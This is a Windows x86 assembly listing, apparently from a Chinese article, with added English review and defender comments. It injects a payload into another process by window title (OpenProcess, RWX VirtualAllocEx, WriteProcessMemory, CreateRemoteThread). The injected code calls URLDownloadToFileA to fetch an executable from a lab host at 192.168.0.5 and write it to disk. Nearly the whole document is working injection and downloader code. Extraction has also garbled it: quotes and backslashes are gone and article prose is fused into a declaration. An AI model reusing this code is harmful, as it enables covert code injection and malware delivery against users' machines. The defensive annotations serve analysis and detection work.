; --- tail of the .data section (the .data directive itself lies above this chunk) ---
; NOTE(review): the next line is a fragment of the article's prose fused with the
; szformat declaration by the extraction; the string operands of the db lines in this
; listing have also lost their quote characters (e.g. db pid是:%d,0 presumably was a
; quoted "pid是:%d",0). The lines are kept as extracted.
大家可能都用过网页szformatdbpid是:%d,0
szbufferdd20dup(0),0 ; 20-dword scratch buffer; only user in the visible code is the wsprintf call that is commented out in start
piddd0 ; target process id, written by GetWindowThreadProcessId in start (passed as offset pid)
hprocessdd0 ; process handle returned by OpenProcess in start
hthreaddd0 ; thread handle returned by CreateRemoteThread in start
pcoderemotedd0 ; base of the region VirtualAllocEx returns inside the target process
path1dbc:a.exe,0 ; probably "c:\a.exe" with the backslash dropped by extraction; not referenced in the visible code (sztit in .code carries the same path)
.const
; Read-only strings used by start to resolve the API the remote thread calls:
; LoadLibrary(userdll) then GetProcAddress(.., szmsg). Defender note: the pair
; urlmon.dll / URLDownloadToFileA is the classic "download and drop" primitive;
; these two strings are a common static indicator for this kind of sample.
szmsgdburldownloadtofilea,0 ; API name resolved with GetProcAddress
userdlldburlmon.dll,0 ; module that exports it
; Earlier MessageBoxA/user32.dll variant of the payload, kept commented out.
;szmsgdbmessageboxa,0
;userdlldbuser32.dll,0
szloadlibdbloadlibrarya,0 ; note the difference from LoadLibraryW (A = ANSI, W = wide-char); not referenced in the visible code
kerdlldbkernel32.dll,0 ; not referenced in the visible code either; presumably intended for a later GetProcAddress — verify against the rest of the file
.code
;-----------------------------------------------------------------------
; Injected payload image. Everything from codebegin up to codelen is copied
; into the target process by WriteProcessMemory in start. Layout:
;   [data: dispdata, sztit] [code: rproc]
; datalen is the size of the data prefix, i.e. the offset of rproc inside
; the image; start adds it to pcoderemote to obtain the remote thread's
; entry point. Placing strings in .code (RWX region, see VirtualAllocEx
; flags in start) is itself a strong runtime indicator for defenders.
;-----------------------------------------------------------------------
codebegin:
dispdatadbhttp://192.168.0.5/nbtreelist.exe,0 ; URL the payload fetches; 192.168.0.5 is a private (RFC 1918) address, i.e. an internal/lab host; the string is the sample's network IoC
sztitdbc:a.exe,0 ; destination path of the download, probably "c:\a.exe" with the backslash dropped by extraction; the name 'tit' is presumably left over from the MessageBox-title variant
datalen=$-codebegin ; bytes of data before rproc = offset of the thread entry point within the image
;-----------------------------------------------------------------------
; rproc — thread procedure executed inside the target process.
; C-equivalent: DWORD WINAPI rproc(FARPROC msgbox)
; In:    msgbox (stack parameter) = address of the API to call. start resolves
;        URLDownloadToFileA (szmsg) in the injecting process and passes it as
;        the CreateRemoteThread parameter; the parameter name dates from the
;        MessageBoxA variant. NOTE(review): this only works if urlmon.dll is
;        mapped at the same base in both processes — assumed, not checked.
; Out:   eax = whatever the called API returns (becomes the thread exit code).
; Clobb: ebx, ecx, edx, flags, plus whatever the called API clobbers. ebx is
;        callee-saved under Win32 but is not preserved here; tolerated only
;        because this is a thread entry point.
; The body is position independent: the image is copied to pcoderemote, an
; address chosen by VirtualAllocEx in the other process, so absolute addresses
; would be wrong there. call @f / pop ebx yields the runtime address of @@;
; subtracting the assemble-time offset of @b leaves the relocation delta in
; ebx, and data is then addressed as [ebx + offset].
; Defender note: the call/pop delta trick followed by an indirect call through
; a parameter is a hallmark of hand-written shellcode; together with the
; OpenProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread
; chain in start it is what host-based detection (e.g. remote-thread creation
; telemetry) keys on.
;-----------------------------------------------------------------------
rprocprocmsgbox ; msgbox = address of the API to call (original comment: "the address of MessageBoxA as parameter")
call@f;pushesi ; pushes the runtime address of @@ as a return address
@@:
popebx ; ebx = runtime address of @@
subebx,offset@b ; ebx = runtime address - assembled address = relocation delta
leaecx,[ebx+dispdata] ; ecx = &URL as mapped in the target process
leaedx,[ebx+sztit] ; edx = &destination path as mapped in the target process
; stdcall, arguments pushed right to left:
; URLDownloadToFileA(pCaller = NULL, szURL = ecx, szFileName = edx, dwReserved = 0, lpfnCB = NULL)
pushnull ; lpfnCB
push0 ; dwReserved
pushedx ; szFileName
pushecx ; szURL
pushnull ; pCaller
callmsgbox ; indirect call through the parameter (stack is balanced by the callee)
ret;重要 -> important: return normally so the remote thread exits with eax as its exit code
rprocendp
codelen=$-codebegin ; code length, xx bytes: total size of the payload image (data + rproc), used by VirtualAllocEx, WriteProcessMemory and VirtualFreeEx in start
start:
;invokefindwindow,0,offsettit;返回计算器窗口句柄
invokefindwindow,offsettit,0
invokegetwindowthreadprocessid,eax,offsetpid;计算机器程序的进程pid号
;invokewsprintf,offsetszbuffer,offsetszformat,pid;把pid用十进制显示
invokeopenprocess,process_all_access,false,pid;打开进程,得到进程句柄
movhprocess,eax;保存进程句柄
invokevirtualallocex,hprocess,0,codelen,mem_commit,page_execute_readwrite
movpcoderemote,eax
invokewriteprocessmemory,hprocess,pcoderemote,offsetcodebegin,codelen,null
movesi,pcoderemote
addesi,datalen
pushesi
invokeloadlibrary,offsetuserdll
invokegetprocaddress,eax,offsetszmsg
popesi
invokecreateremotethread,hprocess,0,0,esi,eax,0,0
movhthread,eax;返回线程句柄
.ifhthread
invokewaitforsingleobject,hthread,infinite;等待线程结束
invokeclosehandle,hthread;关闭线程句柄
.endif
invokevirtualfreeex,hprocess,pcoderemote,codelen,mem_release;释放